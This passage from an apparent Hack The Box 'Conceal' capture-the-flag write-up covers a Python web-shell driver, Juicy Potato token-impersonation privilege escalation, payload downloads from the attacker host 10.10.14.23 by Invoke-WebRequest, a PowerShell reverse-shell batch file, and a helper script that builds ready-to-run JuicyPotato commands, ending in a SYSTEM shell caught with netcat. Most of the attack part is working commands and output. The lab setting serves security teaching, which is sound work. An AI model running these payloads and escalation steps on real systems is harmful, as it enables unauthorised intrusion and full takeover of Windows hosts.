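    """Send cmd to the web shell and return its stdout, or None on timeout.

    Exec(...).StdOut.ReadAll() in the ASP shell blocks until the child
    process exits, so a command that starts a reverse shell does not return
    while that shell is alive. A timeout is therefore the expected result for
    the reverse-shell command, not an error: check the netcat listener.
    """
    url = build_url(shell_url, cmd)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except socket.timeout:
        return None
    except urllib.error.URLError as exc:
        if isinstance(exc.reason, socket.timeout):
            return None
        raise


if __name__ == "__main__":
    command = " ".join(sys.argv[1:]) or "hostname"
    print(build_url(SHELL_URL, command))
    out = run_cmd(SHELL_URL, command)
    print(out if out is not None else "[no reply before timeout: check your listener]")
```

Run it with the reverse-shell command as its argument (or with no argument to just run hostname); the printed URL is what you would paste into the browser.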

Awesome! Now we have the user flag. Time for some privilege escalation. Enumerating the current user’s token privileges shows something interesting: SeImpersonatePrivilege (Impersonate a client after authentication) is Enabled, which is the precondition for the Potato family of token-impersonation attacks.

PS C:\Users\destitute\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

This tells us that we should be able to escalate our privileges using Rotten Potato, but it did not work. I’m guessing it’s because of BITS. Anyway, let’s try the Juicy Potato exploit, which does not depend on the BITS service and instead lets us pick which COM server (by CLSID) to abuse for the SYSTEM token. Download the following to your Kali machine from the Juicy Potato GitHub repository:
JuicyPotato.exe
CLSID.list
test_clsid.bat

Also create a rev.bat file and a rev.ps1 file. For rev.ps1, simply copy the Invoke-PowerShellTcp.ps1 file that was created for the user shell and change the reverse shell port from 443 to 444, so the SYSTEM shell lands on a separate listener.

Rev.bat contents can look like this

root@kali:~/htb/conceal# cat rev.bat
cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\users\destitute\rev.ps1

Host these five files on your Kali box using Apache or a quick Python web server on port 8000 (the port used in the URLs that follow), then download them to the victim.

PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/test_clsid.bat -OutFile C:\\Users\\destitute\\test_clsid.bat
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/CLSID.list -OutFile C:\\Users\\destitute\\CLSID.list
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/JuicyPotato.exe -OutFile C:\\Users\\destitute\\JuicyPotato.exe
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/rev.bat -OutFile C:\\Users\\destitute\\rev.bat
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/rev.ps1 -OutFile C:\\Users\\destitute\\rev.ps1

Next, let’s run test_clsid.bat on the victim from the directory that holds JuicyPotato.exe and CLSID.list. It tries every CLSID in the list and writes one {CLSID};ACCOUNT line per result to result.log. Look at it and pick any CLSID whose account is NT AUTHORITY\SYSTEM; the LOCAL SERVICE ones would only hand us a LOCAL SERVICE token. Let’s pick {47135eea-06b6-4452-8787-4a187c64a47e}.

PS C:\users\destitute> type result.log
{0289a7c5-91bf-4547-81ae-fec91a89dec5};CONCEAL\Destitute
{98068995-54d2-4136-9bc9-6dbcb0a4683f};CONCEAL\Destitute
{9acf41ed-d457-4cc1-941b-ab02c26e4686};CONCEAL\Destitute
{9678f47f-2435-475c-b24a-4606f8161c16};CONCEAL\Destitute
{417976B7-917D-4F1E-8F14-C18FCCB0B3A8};CONCEAL\Destitute
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
{B441840A-5CEF-42F1-BE06-4E31A90E74D7};NT AUTHORITY\LOCAL SERVICE
{B7BC3EB9-B145-4574-B729-7D78126EB4C8};NT AUTHORITY\LOCAL SERVICE
{A8BE33B3-D275-459B-A853-A2150531C8B3};NT AUTHORITY\LOCAL SERVICE
{9694B5A2-54CE-4837-BA0A-F52FD7699F12};NT AUTHORITY\LOCAL SERVICE
{A0D76288-0FB2-477A-96F9-F7EFFD7ED5D3};NT AUTHORITY\LOCAL SERVICE
{CC9FA1A3-ADDE-49A9-B435-34CE6E5DA3DB};NT AUTHORITY\LOCAL SERVICE
{F1B75166-312C-4DC6-BA41-C2E2486C9913};NT AUTHORITY\LOCAL SERVICE
{F94358B1-E9AE-4D5C-AF66-CE50E67803C7};NT AUTHORITY\LOCAL SERVICE
{EA5EAA7B-1E81-4C76-BF2D-F2A867F764A1};NT AUTHORITY\LOCAL SERVICE
{DAB26424-5F5C-4834-8685-A4DB44DF8083};NT AUTHORITY\LOCAL SERVICE
{DF175E5E-5488-49B7-BCB9-B7204933E26F};NT AUTHORITY\LOCAL SERVICE
{4D098DC6-3080-4A11-9887-4C77FD7C2ED2};NT AUTHORITY\LOCAL SERVICE
{46B559E9-0D2F-44AC-9EE7-AE6D9384B292};NT AUTHORITY\LOCAL SERVICE
{557C6CBF-CD77-45CF-84E8-8F5A8A331BAD};NT AUTHORITY\LOCAL SERVICE
{37998346-3765-45B1-8C66-AA88CA6B20B8};NT AUTHORITY\LOCAL SERVICE
{206490E7-09B5-4C9D-8E54-254B87A5CEAF};NT AUTHORITY\LOCAL SERVICE
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029};NT AUTHORITY\LOCAL SERVICE
{235EB944-F722-47DB-8EE7-1EE27A8D4F98};NT AUTHORITY\LOCAL SERVICE
{21F282D1-A881-49E1-9A3A-26E44E39B86C};NT AUTHORITY\LOCAL SERVICE
{7ECB3DBE-742D-4B43-BF3E-2587BE1BFF72};NT AUTHORITY\LOCAL SERVICE
{770FDC97-76E7-4067-B14C-2DDB3A7517F2};NT AUTHORITY\LOCAL SERVICE
{8190FA8C-3A62-49FB-B145-071B4B74578D};NT AUTHORITY\LOCAL SERVICE
{7ECC8054-7AE3-486D-9CBA-8ED0B5ED61AC};NT AUTHORITY\LOCAL SERVICE
{754EC012-E0B0-4F32-A810-77F639CBF103};NT AUTHORITY\LOCAL SERVICE
{73978CED-828C-49AB-A403-9ABACDCE1505};NT AUTHORITY\LOCAL SERVICE
{680442B0-692A-465C-B47D-783C4EC5B6A2};NT AUTHORITY\LOCAL SERVICE
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700};NT AUTHORITY\SYSTEM
{5B99FA76-721C-423C-ADAC-56D03C8A8007};NT AUTHORITY\SYSTEM
{42C21DF5-FB58-4102-90E9-96A213DC7CE8};NT AUTHORITY\SYSTEM
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744};NT AUTHORITY\SYSTEM
{C63261E4-6052-41FF-B919-496FECF4C4E5};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD};NT AUTHORITY\SYSTEM
{22f5b1df-7d7a-4d21-97f8-c21aefba859c};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{581333F6-28DB-41BE-BC7A-FF201F12F3F6};NT AUTHORITY\LOCAL SERVICE
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM
{687e55ca-6621-4c41-b9f1-c0eddc94bb05};NT AUTHORITY\SYSTEM
{B31118B2-1F49-48E5-B6F5-BC21CAEC56FB};NT AUTHORITY\SYSTEM
{6d8ff8e5-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{204810b9-73b2-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e1-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e7-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{2e5e84e9-4049-4244-b728-2d24227157c7};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dd-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8df-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8d2-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dc-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{0fb40f0d-1021-4022-8da0-aab0588dfc8b};NT AUTHORITY\LOCAL SERVICE
{B91D5831-B1BD-4608-8198-D72E155020F7};NT AUTHORITY\SYSTEM
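Picking the right CLSID out of result.log by hand is fine for a box this size, but the file format is simple enough to parse. The following is an added example, not part of the original write-up and not JuicyPotato’s own code: it reads the {CLSID};ACCOUNT lines test_clsid.bat produces, keeps only those that yield NT AUTHORITY\SYSTEM, and prints the matching JuicyPotato command line used later in this write-up. The embedded log is a constructed excerpt of the result.log shown above, with one junk line added to show that non-matching lines are skipped.

```python
"""Select SYSTEM-yielding CLSIDs from JuicyPotato's result.log (added example).

Parses the "{CLSID};ACCOUNT" lines written by test_clsid.bat and builds the
JuicyPotato invocation used in the write-up. Nothing here is JuicyPotato's
own code; the file format and the flags are as shown on this page.
"""
import re
import sys
from typing import Dict, List

# Constructed excerpt of the result.log from the write-up, plus a junk line.
SAMPLE_RESULT_LOG = """\
{0289a7c5-91bf-4547-81ae-fec91a89dec5};CONCEAL\\Destitute
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\\SYSTEM
{B441840A-5CEF-42F1-BE06-4E31A90E74D7};NT AUTHORITY\\LOCAL SERVICE
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\\SYSTEM
this line is not a result and must be ignored
{B91D5831-B1BD-4608-8198-D72E155020F7};NT AUTHORITY\\SYSTEM
"""

# A CLSID is 32 hex digits and 4 hyphens (8-4-4-4-12) inside braces.
_RESULT_LINE = re.compile(r"^(\{[0-9A-Fa-f-]{36}\});(.+)$")


def parse_result_log(text: str) -> Dict[str, str]:
    """Map each CLSID to the account JuicyPotato obtained with it.

    Lines that do not have the {CLSID};ACCOUNT shape are skipped rather than
    raising, so stray tool output in the log does not break the parse.
    """
    results: Dict[str, str] = {}
    for line in text.splitlines():
        m = _RESULT_LINE.match(line.strip())
        if m:
            results[m.group(1)] = m.group(2).strip()
    return results


def system_clsids(text: str) -> List[str]:
    """CLSIDs whose COM server yielded NT AUTHORITY\\SYSTEM, in log order."""
    return [clsid for clsid, account in parse_result_log(text).items()
            if account.upper() == "NT AUTHORITY\\SYSTEM"]


def juicypotato_cmdline(clsid: str, program: str, port: int = 1337) -> str:
    """Build the invocation used in the write-up.

    -l is the local port for the COM listener, -p the program to run, -c the
    CLSID to abuse, and -t * tries both CreateProcessWithTokenW (needs
    SeImpersonatePrivilege) and CreateProcessAsUser (needs
    SeAssignPrimaryTokenPrivilege).
    """
    return f'.\\JuicyPotato.exe -l {port} -p {program} -t * -c "{clsid}"'


if __name__ == "__main__":
    log_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_RESULT_LOG
    candidates = system_clsids(log_text)
    if not candidates:
        sys.exit("no CLSID in the log yields NT AUTHORITY\\SYSTEM")
    for clsid in candidates:
        print(juicypotato_cmdline(clsid, r"c:\users\destitute\rev.bat"))
```

Feed it the real result.log copied back from the box (python3 pick_clsid.py result.log) and it prints one ready-to-run JuicyPotato line per SYSTEM candidate; if the first CLSID fails on a given box, the next candidate is the one to try.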

Now we are all set. Let’s execute JuicyPotato: -l is the local port its COM listener binds, -p the program to launch, -c the CLSID to abuse, and -t * asks it to try both CreateProcessWithTokenW (needs SeImpersonatePrivilege) and CreateProcessAsUser (needs SeAssignPrimaryTokenPrivilege). Only the first of those privileges is enabled for us, so it is the CreateProcessWithTokenW path that succeeds, as the output confirms.

PS C:\users\destitute> .\JuicyPotato.exe -l 1337 -p c:\users\destitute\rev.bat -t * -c "{47135eea-06b6-4452-8787-4a187c64a47e}"
Testing {47135eea-06b6-4452-8787-4a187c64a47e} 1337
......
[+] authresult 0
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Your second netcat listener, on port 444, catches the SYSTEM reverse shell. And you are root (well, NT AUTHORITY\SYSTEM)!

root@kali:~/htb/conceal# nc -nvlp 444
listening on [any] 444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.116] 50798
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
Conceal
PS C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
